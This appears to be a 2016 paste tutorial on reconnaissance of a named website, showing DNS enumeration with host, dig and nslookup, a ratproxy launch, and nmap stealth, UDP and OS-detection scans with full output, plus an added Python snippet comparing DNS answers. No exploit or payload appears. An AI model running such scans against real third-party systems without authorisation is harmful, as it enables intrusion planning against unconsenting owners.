SaintDruG

HOW TO SCAN A TARGET

May 30th, 2016
1. First of all, identify the target that you want to scan.

TARGET

http://www.vyxunbnbs.com


HOW TO USE NSLOOKUP, DIG, HOST AND KNOCK TO GET DNS INFO ON THE TARGET MACHINE:

┌─[root@parrot]─[~]
└──╼ #host vyxunbnbs.com
vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.

┌─[✗]─[root@parrot]─[~]
└──╼ #host -t a vyxunbnbs.com
vyxunbnbs.com has address 198.71.232.3

┌─[root@parrot]─[~]
└──╼ #host -t mx vyxunbnbs.com
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -t ns vyxunbnbs.com
vyxunbnbs.com name server ns67.domaincontrol.com.
vyxunbnbs.com name server ns68.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #host -t txt vyxunbnbs.com
vyxunbnbs.com has no TXT record

┌─[root@parrot]─[~]
└──╼ #host -t cname vyxunbnbs.com
vyxunbnbs.com has no CNAME record

┌─[root@parrot]─[~]
└──╼ #host -t soa vyxunbnbs.com
vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

┌─[root@parrot]─[~]
└──╼ #host vyxunbnbs.com ns67.domaincontrol.com
Using domain server:
Name: ns67.domaincontrol.com
Address: 216.69.185.44#53
Aliases:

vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host vyxunbnbs.com ns68.domaincontrol.com
Using domain server:
Name: ns68.domaincontrol.com
Address: 208.109.255.44#53
Aliases:

vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -a vyxunbnbs.com
Trying "vyxunbnbs.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5689
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vyxunbnbs.com. IN ANY

;; ANSWER SECTION:
vyxunbnbs.com. 510 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 455 IN A 198.71.232.3
vyxunbnbs.com. 2112 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 2112 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 3455 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3455 IN NS ns68.domaincontrol.com.

Received 209 bytes from 127.0.0.1#53 in 18 ms

┌─[root@parrot]─[~]
└──╼ #host -t any vyxunbnbs.com
vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com name server ns68.domaincontrol.com.
vyxunbnbs.com name server ns67.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #host -6 vyxunbnbs.com
vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -6 -a vyxunbnbs.com
Trying "vyxunbnbs.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14190
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vyxunbnbs.com. IN ANY

;; ANSWER SECTION:
vyxunbnbs.com. 471 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 416 IN A 198.71.232.3
vyxunbnbs.com. 2073 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 2073 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 3416 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3416 IN NS ns68.domaincontrol.com.

Received 209 bytes from ::1#53 in 14 ms

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 vyxunbnbs.com ns67.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 vyxunbnbs.com ns68.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 -t ns vyxunbnbs.com ns68.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 -t ns vyxunbnbs.com ns67.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host 198.71.232.3
3.232.71.198.in-addr.arpa domain name pointer ip-198-71-232-3.ip.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -v -t a vyxunbnbs.com
Trying "vyxunbnbs.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21861
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vyxunbnbs.com. IN A

;; ANSWER SECTION:
vyxunbnbs.com. 259 IN A 198.71.232.3

Received 47 bytes from 127.0.0.1#53 in 1 ms

┌─[root@parrot]─[~]
└──╼ #host -v -t a ip-198-71-232-3.ip.secureserver.net
Trying "ip-198-71-232-3.ip.secureserver.net"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38259
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ip-198-71-232-3.ip.secureserver.net. IN A

;; ANSWER SECTION:
ip-198-71-232-3.ip.secureserver.net. 3600 IN A 198.71.232.3

Received 69 bytes from 127.0.0.1#53 in 44 ms

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com a

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com a
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8729
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN A

;; ANSWER SECTION:
vyxunbnbs.com. 164 IN A 198.71.232.3

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:00 CEST 2016
;; MSG SIZE rcvd: 58

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com mx

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com mx
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62678
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN MX

;; ANSWER SECTION:
vyxunbnbs.com. 1816 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 1816 IN MX 0 smtp.secureserver.net.

;; Query time: 19 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:04 CEST 2016
;; MSG SIZE rcvd: 106

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com ns

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com ns
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60292
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN NS

;; ANSWER SECTION:
vyxunbnbs.com. 3156 IN NS ns68.domaincontrol.com.
vyxunbnbs.com. 3156 IN NS ns67.domaincontrol.com.

;; Query time: 12 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:07 CEST 2016
;; MSG SIZE rcvd: 94

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com txt

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36884
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN TXT

;; AUTHORITY SECTION:
vyxunbnbs.com. 180 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

;; Query time: 12 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:13 CEST 2016
;; MSG SIZE rcvd: 110

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com soa

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com soa
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39124
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN SOA

;; ANSWER SECTION:
vyxunbnbs.com. 200 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

;; Query time: 12 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:18 CEST 2016
;; MSG SIZE rcvd: 110

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com cname

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com cname
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22218
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN CNAME

;; AUTHORITY SECTION:
vyxunbnbs.com. 171 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:38 CEST 2016
;; MSG SIZE rcvd: 110

┌─[root@parrot]─[~]
└──╼ #dig +trace vyxunbnbs.com

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> +trace vyxunbnbs.com
;; global options: +cmd
. 287648 IN NS c.root-servers.net.
. 287648 IN NS i.root-servers.net.
. 287648 IN NS d.root-servers.net.
. 287648 IN NS a.root-servers.net.
. 287648 IN NS f.root-servers.net.
. 287648 IN NS b.root-servers.net.
. 287648 IN NS l.root-servers.net.
. 287648 IN NS k.root-servers.net.
. 287648 IN NS g.root-servers.net.
. 287648 IN NS e.root-servers.net.
. 287648 IN NS m.root-servers.net.
. 287648 IN NS h.root-servers.net.
. 287648 IN NS j.root-servers.net.
. 510154 IN RRSIG NS 8 0 518400 20160608050000 20160529040000 60615 . LS0Bk52wYFCmp8Sk08+ePPeZV1ar3AciH05VrH5wlzpc5L1j7fW+Td6b 6yN+34QBVGQ+U0YqDCg8K63nUFxdEY1zGW2v9YjzvdNwVI7UnLIpqNK7 KNny7GHnoS/iB5T6wGeoXlJrlmCqGrhtbAuXdlkbViOELcbpK5ZvGs6L w3s=
;; Received 397 bytes from 127.0.0.1#53(127.0.0.1) in 264 ms

com. 172800 IN NS l.gtld-servers.net.
com. 172800 IN NS c.gtld-servers.net.
com. 172800 IN NS f.gtld-servers.net.
com. 172800 IN NS h.gtld-servers.net.
com. 172800 IN NS b.gtld-servers.net.
com. 172800 IN NS k.gtld-servers.net.
com. 172800 IN NS e.gtld-servers.net.
com. 172800 IN NS j.gtld-servers.net.
com. 172800 IN NS m.gtld-servers.net.
com. 172800 IN NS i.gtld-servers.net.
com. 172800 IN NS g.gtld-servers.net.
com. 172800 IN NS a.gtld-servers.net.
com. 172800 IN NS d.gtld-servers.net.
com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
com. 86400 IN RRSIG DS 8 1 86400 20160608050000 20160529040000 60615 . D/SvLl6M/vyF6MOKUE220+xQgbpwKHLA+7eJedh6oJwvXiXB6QAPalag hfjxDtzqQ71OYQk0TyOOcW2CaTqduszIQjf/ckB9RAds1aip3b+BWMvq lSFtLCuKsFmKZkkAhhlNZRyVFc9s8wLW+G/RL52sQpRGMBLo3etB2/uX ckg=
;; Received 737 bytes from 192.36.148.17#53(i.root-servers.net) in 305 ms

vyxunbnbs.com. 172800 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 172800 IN NS ns68.domaincontrol.com.
CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20160603045915 20160527034915 34745 com. pkQ5LWptuG019VnVIJOYy/noEwncYk2kml2Qkf+aTLF7lPHdRvcCkC0h ruJdoZAMHgX7byAmPSR9vi8q6OvKdXVmsMKfUBdLMNMpUhaBHpcTe1AI ezemeJmvAjVyqo7wVYwGa1/Y9ZHuUC9zKmc1xGbtP+jB/GiZHz9vShwH ohc=
9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN NSEC3 1 1 0 - 9M17MO9DKQOAC1TE5B8KURUTFNKS98J7 NS DS RRSIG
9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN RRSIG NSEC3 8 2 86400 20160604043916 20160528032916 34745 com. Cfkvje5CuuZtOQPGsBBMYJm3/6g3IRh7U6QorY6chCMhRiMWGAXKTwQL 84cGbqkma5Iz9A3BwYRdSqx9u27Ou2QA3ipt8zKJaD6ed0IeI2SbU8QZ HLuKxAcheIIqTf1pHy2cvkEjMDW6k3EHqdKR1goBKrESteb7ZPW7v0hY ih8=
;; Received 611 bytes from 192.5.6.30#53(a.gtld-servers.net) in 122 ms

vyxunbnbs.com. 600 IN A 198.71.232.3
vyxunbnbs.com. 3600 IN NS ns68.domaincontrol.com.
vyxunbnbs.com. 3600 IN NS ns67.domaincontrol.com.
;; Received 110 bytes from 208.109.255.44#53(ns68.domaincontrol.com) in 30 ms

┌─[root@parrot]─[~]
└──╼ #dig +short vyxunbnbs.com
198.71.232.3

┌─[root@parrot]─[~]
└──╼ #dig +noall +answer vyxunbnbs.com any
vyxunbnbs.com. 108 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 53 IN A 198.71.232.3
vyxunbnbs.com. 1710 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 1710 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 3053 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3053 IN NS ns68.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #dig -x +short 198.71.232.3

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> -x +short 198.71.232.3
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54927
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;+short.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
in-addr.arpa. 3599 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073655 1800 900 604800 3600

;; Query time: 11 msec
;; SERVER: ::1#53(::1)
;; WHEN: Sun May 29 14:21:01 CEST 2016
;; MSG SIZE rcvd: 116

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27483
;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;198.71.232.3. IN A

;; ANSWER SECTION:
198.71.232.3. 0 IN A 198.71.232.3

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:21:01 CEST 2016
;; MSG SIZE rcvd: 57

┌─[root@parrot]─[~]
└──╼ #dig -x 198.71.232.3 +short
ip-198-71-232-3.ip.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #dig +nssearch vyxunbnbs.com
SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 216.69.185.44 in 30 ms.
SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 208.109.255.44 in 30 ms.
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer a vyxunbnbs.com
vyxunbnbs.com. 600 IN A 198.71.232.3

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer mx vyxunbnbs.com
vyxunbnbs.com. 1529 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 1529 IN MX 10 mailstore1.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer ns vyxunbnbs.com
vyxunbnbs.com. 2868 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 2868 IN NS ns68.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer cname vyxunbnbs.com

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer txt vyxunbnbs.com

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer url vyxunbnbs.com
vyxunbnbs.com. 554 IN A 198.71.232.3

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com +dnssec

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com +dnssec
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12137
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN A

;; ANSWER SECTION:
vyxunbnbs.com. 446 IN A 198.71.232.3

;; Query time: 16 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 15:14:48 CEST 2016
;; MSG SIZE rcvd: 58

┌─[root@parrot]─[/home/roy/Desktop]
└──╼ #nslookup
> set type=A
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
Name: vyxunbnbs.com
Address: 198.71.232.3
> set type=MX
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
vyxunbnbs.com mail exchanger = 0 smtp.secureserver.net.
vyxunbnbs.com mail exchanger = 10 mailstore1.secureserver.net.

Authoritative answers can be found from:
> set type=ns
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
vyxunbnbs.com nameserver = ns68.domaincontrol.com.
vyxunbnbs.com nameserver = ns67.domaincontrol.com.

Authoritative answers can be found from:
> set type=cname
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

www.vyxunbnbs.com canonical name = vyxunbnbs.com.

┌─[root@parrot]─[~]
└──╼ #nslookup
> set type=TXT
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.

Authoritative answers can be found from:
vyxunbnbs.com
origin = ns67.domaincontrol.com
mail addr = dns.jomax.net
serial = 2016052700
refresh = 28800
retry = 7200
expire = 604800
minimum = 600
>

> set type=SOA
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
vyxunbnbs.com
origin = ns67.domaincontrol.com
mail addr = dns.jomax.net
serial = 2016052700
refresh = 28800
retry = 7200
expire = 604800
minimum = 600

Authoritative answers can be found from:
>


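The host, dig and nslookup queries above were run against the resolver and against each authoritative server (ns67 and ns68) separately; all of them should return the same record set. The Python below is an added example, not part of the original paste: it parses `dig +noall +answer` style output into records and diffs two servers' answers. The first sample answer is constructed from the records shown above; the stale second server is invented to show what the comparison catches.

```python
"""Parse dig '+noall +answer' output and compare two servers' answers.
Added example, not part of the original paste; sample data is constructed
from the vyxunbnbs.com records the paste shows."""
import re
from collections import defaultdict

# Constructed sample: the records `dig +noall +answer vyxunbnbs.com any`
# returned on the page (TTLs count down in a cache, so they are ignored).
ANSWER_NS67 = """\
vyxunbnbs.com. 108 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 53 IN A 198.71.232.3
vyxunbnbs.com. 1710 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 1710 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 3053 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3053 IN NS ns68.domaincontrol.com.
"""

# Constructed (hypothetical): a secondary whose copy of the zone lags
# behind, with an older SOA serial and a missing MX record.
ANSWER_NS68_STALE = """\
vyxunbnbs.com. 600 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052600 28800 7200 604800 600
vyxunbnbs.com. 600 IN A 198.71.232.3
vyxunbnbs.com. 3600 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 3600 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3600 IN NS ns68.domaincontrol.com.
"""

# One resource record per line: name TTL IN TYPE rdata
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z0-9]+)\s+(.*)$")


def parse_answer(text):
    """Return {rtype: set(rdata)}; comment (';') and blank lines are skipped."""
    records = defaultdict(set)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if not m:
            raise ValueError("unparsed dig line: " + line)
        _name, _ttl, rtype, rdata = m.groups()
        records[rtype].add(" ".join(rdata.split()))
    return dict(records)


def soa_serial(records):
    """SOA rdata is 'mname rname serial refresh retry expire minimum'."""
    (soa,) = records["SOA"]
    return int(soa.split()[2])


def mail_exchangers(records):
    """MX rdata is 'preference host'; the lowest preference is tried first."""
    mx = [(int(p), h) for p, h in (r.split() for r in records.get("MX", ()))]
    return [h for _p, h in sorted(mx)]


def compare_servers(answer_a, answer_b):
    """Diff two servers' answers for the same name. Authoritative servers for
    one zone should agree exactly; a serial or record mismatch usually means
    a failed or lagging zone transfer and is worth an alert."""
    a, b = parse_answer(answer_a), parse_answer(answer_b)
    findings = []
    if soa_serial(a) != soa_serial(b):
        findings.append("SOA serial differs: %d vs %d" % (soa_serial(a), soa_serial(b)))
    for rtype in sorted(set(a) | set(b)):
        only_a = a.get(rtype, set()) - b.get(rtype, set())
        only_b = b.get(rtype, set()) - a.get(rtype, set())
        for rdata in sorted(only_a):
            findings.append("%s only on first server: %s" % (rtype, rdata))
        for rdata in sorted(only_b):
            findings.append("%s only on second server: %s" % (rtype, rdata))
    return findings


if __name__ == "__main__":
    recs = parse_answer(ANSWER_NS67)
    print("serial:", soa_serial(recs))
    print("MX order:", mail_exchangers(recs))
    print("has TXT:", "TXT" in recs)   # no SPF/DMARC TXT published on the page
    for finding in compare_servers(ANSWER_NS67, ANSWER_NS68_STALE):
        print("-", finding)
```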
RUN RATPROXY

┌─[root@parrot]─[~]
└──╼ #ratproxy
ratproxy version 1.58-beta by <lcamtuf@google.com>

[!] WARNING: Running with no command-line config options specified. This is
almost certainly not what you want, as most checks are disabled. Please
consult the documentation or use --help for more information.

[*] Proxy configured successfully. Have fun, and please do not be evil.
[+] Accepting connections on port 8080/tcp (local only)...

Do not close the window; minimize it and open a new terminal.


RUN NMAP

┌─[✗]─[root@parrot]─[~]
└──╼ #nmap -sV -Pn 198.71.232.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:03 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 198.71.232.3
Host is up (0.11s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Samsung AllShare httpd
443/tcp open ssl/http Samsung AllShare httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds


┌─[root@parrot]─[~]
└──╼ #nmap -sS -sU -T4 -A -v 198.71.232.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:04 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating Ping Scan at 12:04
Scanning 198.71.232.3 [4 ports]
Completed Ping Scan at 12:04, 0.11s elapsed (1 total hosts)
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating SYN Stealth Scan at 12:04
Scanning 198.71.232.3 [1000 ports]
Discovered open port 443/tcp on 198.71.232.3
Discovered open port 80/tcp on 198.71.232.3
Completed SYN Stealth Scan at 12:04, 9.18s elapsed (1000 total ports)
Initiating UDP Scan at 12:04
Scanning 198.71.232.3 [1000 ports]
Completed UDP Scan at 12:05, 5.55s elapsed (1000 total ports)
Initiating Service scan at 12:05
Scanning 1002 services on 198.71.232.3
Service scan Timing: About 0.40% done
Service scan Timing: About 3.29% done; ETC: 13:33 (1:25:39 remaining)
Service scan Timing: About 6.29% done; ETC: 13:14 (1:05:05 remaining)
Service scan Timing: About 9.28% done; ETC: 13:07 (0:57:01 remaining)
Service scan Timing: About 12.28% done; ETC: 13:04 (0:52:10 remaining)
Service scan Timing: About 15.27% done; ETC: 13:02 (0:48:33 remaining)
Service scan Timing: About 20.86% done; ETC: 12:54 (0:39:05 remaining)
Service scan Timing: About 21.26% done; ETC: 12:59 (0:43:13 remaining)
Service scan Timing: About 26.75% done; ETC: 12:54 (0:36:12 remaining)
Service scan Timing: About 27.25% done; ETC: 12:58 (0:38:57 remaining)
Service scan Timing: About 32.73% done; ETC: 12:54 (0:33:09 remaining)
Service scan Timing: About 38.72% done; ETC: 12:54 (0:30:09 remaining)
Service scan Timing: About 44.71% done; ETC: 12:54 (0:27:10 remaining)
Service scan Timing: About 50.70% done; ETC: 12:54 (0:24:12 remaining)
Service scan Timing: About 56.69% done; ETC: 12:54 (0:21:14 remaining)
Service scan Timing: About 62.67% done; ETC: 12:54 (0:18:18 remaining)
Service scan Timing: About 68.56% done; ETC: 12:54 (0:15:25 remaining)
Service scan Timing: About 74.55% done; ETC: 12:54 (0:12:29 remaining)
Service scan Timing: About 80.54% done; ETC: 12:54 (0:09:32 remaining)
Service scan Timing: About 86.03% done; ETC: 12:54 (0:06:53 remaining)
Service scan Timing: About 92.02% done; ETC: 12:54 (0:03:56 remaining)
Service scan Timing: About 98.00% done; ETC: 12:54 (0:00:59 remaining)
Completed Service scan at 12:54, 2976.47s elapsed (1002 services on 1 host)
Initiating OS detection (try #1) against 198.71.232.3
Retrying OS detection (try #2) against 198.71.232.3
Initiating Traceroute at 12:54
Completed Traceroute at 12:54, 3.05s elapsed
NSE: Script scanning 198.71.232.3.
Initiating NSE at 12:54
Completed NSE at 12:58, 216.46s elapsed
Initiating NSE at 12:58
Completed NSE at 12:58, 0.24s elapsed
Nmap scan report for 198.71.232.3
Host is up (0.11s latency).
Not shown: 1000 open|filtered ports, 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Samsung AllShare httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: DPS/1.0.3
|_http-title: 404 Not Found
443/tcp open ssl/http Samsung AllShare httpd
|_http-server-header: DPS/1.0.3
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=*.godaddysites.com/organizationName=GoDaddy.com, LLC/stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=Go Daddy Secure Certification Authority/organizationName=GoDaddy.com, Inc./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2013-12-09T21:03:50
| Not valid after: 2016-12-09T21:03:50
| MD5: b9fa bb00 6886 5d4c 47be 2cae 6529 fdce
|_SHA-1: 95a5 92da fdd9 dcb8 e554 5599 1d1b 5ae1 7f0f d2c7
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
